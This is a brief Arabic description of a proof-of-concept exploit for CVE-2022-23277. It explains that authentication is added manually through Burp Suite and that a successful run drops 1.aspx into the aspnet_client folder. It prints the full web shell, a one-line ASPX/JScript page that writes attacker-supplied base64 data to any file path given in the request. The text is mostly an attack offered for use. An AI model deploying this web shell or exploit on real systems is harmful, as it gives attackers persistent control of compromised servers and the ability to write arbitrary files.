
CVE-2022-23277 إثبات المفهوم لكتابة شيل ويب إلى aspnet_client
يجب إضافة جزء المصادقة يدويًا عبر burpsuite، وبعد نجاح الاستغلال سيتم كتابة 1.aspx في مسار aspnet_client.
webshell:
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
يمكن الرجوع إلى مقالنا لتفاصيل الاستغلال
